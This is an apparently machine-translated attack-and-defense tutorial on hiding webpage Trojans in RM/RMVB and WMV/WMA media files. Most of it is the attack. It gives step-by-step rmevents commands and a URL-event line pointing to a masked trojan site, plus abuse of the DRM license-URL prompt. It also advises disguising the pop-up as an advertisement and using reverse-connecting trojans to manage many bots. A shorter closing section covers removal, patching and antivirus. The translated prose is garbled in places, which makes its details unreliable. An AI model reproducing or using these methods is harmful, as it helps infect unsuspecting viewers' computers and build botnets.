Attack and Defense against huge media file Trojans

Nowadays, the most popular types of media files are RM and RMVB files and WMV and WMA files, which are well supported by streaming media, these two media file formats are used for almost all media files such as movies and music on the network. Therefore, if a trojan is inserted into a media file, the unique concealment of Trojans in media files will cause victims to be attacked by webpage Trojans without knowing them, and the dangers are evident.

Attack: media files are planted in the invisible

Add Trojans to RM and RMVB

Helix Producer Plus is a graphical professional streaming media file production tool. We can use Helix Producer Plus to convert files in other formats into RM or RMVB formats, of course, you can also re-edit the existing RM file. While editing, We can insert the prepared webpage Trojan into it. In this way, as long as the edited media file is opened, the webpage Trojan inserted in it will be opened. We can even control the time when the webpage Trojan is opened to make the webpage Trojan more concealed.

Step 1: first download Helix Producer Plus and install it all the way "Next". Then we need to find a RM movie file that can insert a webpage Trojan into it and change it to film. rm, and then copy it to the RealMediaEditor folder in the Helix Producer Plus installation directory.

Step 2: Create a new document named test.txt in this folder and write the following command in the test.txt file: "u 00:07:00 http: // www. ***. com/in
Dex. php ", this command means that when a media file is played for 7th minutes, the URL event is triggered, and the event ends at 7 minutes 30 seconds, the URL is at the end, we can change this URL to the URL of our webpage Trojan (the webpage Trojan has been introduced for many times and will not be repeated here ), in this way, the webpage Trojan can be opened when someone else looks at the media file, so that he can do it without knowing it (1 ).

TIPS: try to conceal the webpage Trojan and imitate the normal webpage as much as possible. Otherwise, anyone will be suspicious if the webpage suddenly pops up when viewing the media file, of course, the best effect is to make it a similar advertisement webpage. If someone else thinks it is an advertisement, it will be closed. At this time, we have successfully planted a Trojan. For Trojan Horse selection, try to use a Trojan with reverse connection, such as the gray pigeon. Otherwise, even if there are hundreds of bots, It is very troublesome to connect one by one.

Step 3: RunCMD(Command prompt), enter the RealMediaEditor folder, and enter the command: "rmevents-I film. rm-e test.txt-o film2.rm ", which is the most critical step. It means that the URL event test.txt is merged to film by using the rmevents.exeof Helix Producer plus. rm, and save it as film2.rm. The newly generated film2.rm is a media file with webpage Trojans (2 ).

Add Trojans to WMV and WMA

For WMA and WMV files, we can use the default Player Windows Media Player's "Microsoft Windows Media Player digital permission management to load arbitrary web page vulnerabilities" to insert Trojans. When we play a malicious file that has been inserted with a Trojan, the player will first pop up a prompt window, indicating that the file is encrypted by DRM and requires URL verification certificate, this URL is the webpage Trojan address we have set in advance. When the user clicks "yes" for verification, the trojan is successfully planted. Like RM file Trojans, we also need the same tool-WMDRM package encryptor-to insert Trojans into WMV files. This is a file that can encrypt WMA and WMV by using DRM, the software itself is designed to protect the copyright of media files, but in the hands of attackers, it becomes an accomplice of hackers.

Install the "WMDRM package encryptor" and run it. The software interface is very simple (3 ). The "Custom packaging" tab appears first. Click the Browse button on the right of the "source file" and select a WMA or WMV file, then, in the "output directory" below, select the path to save the generated malicious file, and then fill in the generated file Suffix in "output file suffix". We recommend that you keep it consistent with the source file. Then, we switch to the "authentication string" tag and enter the webpage Trojan address in the "authentication URL" column, for example, http: // www. ***. com/index. php. Keep the default value for others. Switch to the custom packaging tab and click the "package encryption" button to generate a malicious media file containing webpage Trojans.

When a user opens this malicious Media file, Windows Media Player asks you to obtain the certificate (4). Click "OK" and our webpage Trojan will pop up.

When there is an attack, there is defense. We can't sit down and let them cut it down. In fact, malicious media files are not as mysterious as we think. As long as we have a little knowledge about how to clear web Trojans, this completely prevents webpage trojans from running.

Protection: malicious media.

　　Methods for clearing RM and RMVB Trojans

In this document, we will create a new file named test.txt with an empty content, and then run "rmevents-I has a trojan file in CMD. rm-e test.txt-o film. in this way, you can overwrite the URL event that is triggered by the same way as the trojan is inserted. rm is a clean media file without Trojans.

If you are not familiar with the use of command prompts, we use Helix RealMedia Editor to clear webpage Trojans. Open the rmevents.exe file under the realmediaeditorfolder, and create a test.txt file with an empty content in the sample. Then, click Tools in the menu bar of Helix RealMedia Editor and select Merge Events ". Select test.txt, and click "OK ". Finally, select "Save RealMedia filepath" in the "File" menu to Save the media File. The principle is the same as that of using rmevents.exe to clear web Trojans.

　　How to clear WMA and WMV Trojans

This vulnerability exploits the Windows Media Player vulnerability. Therefore, we cannot clear the malicious DRM encryption information in Media files. The only thing we can do is to install patches, malicious WMA and WMV files do not work for patched Windows Media Player. Patch: http://www.microsoft.com/technet/security/
In addition, we can select other players to play media files, such as storm videos and mplayers. Some functions that insert webpage Trojans into media files will not work in front of them, therefore, this can also prevent media webpage Trojans to a certain extent.

Security largely depends on the security awareness of users. Only by raising security awareness can we reduce the probability of recruitment, such as not opening unfamiliar media files or accessing unfamiliar websites at will, of course, security awareness alone is not enough. We also need anti-virus software and other good helpers. After all, any webpage Trojan needs to be downloaded to a local computer before it can run. Anti-virus software can prevent trojans from running, therefore, we must promptly upgrade the antivirus software virus database. Only protection before attack can be considered real security.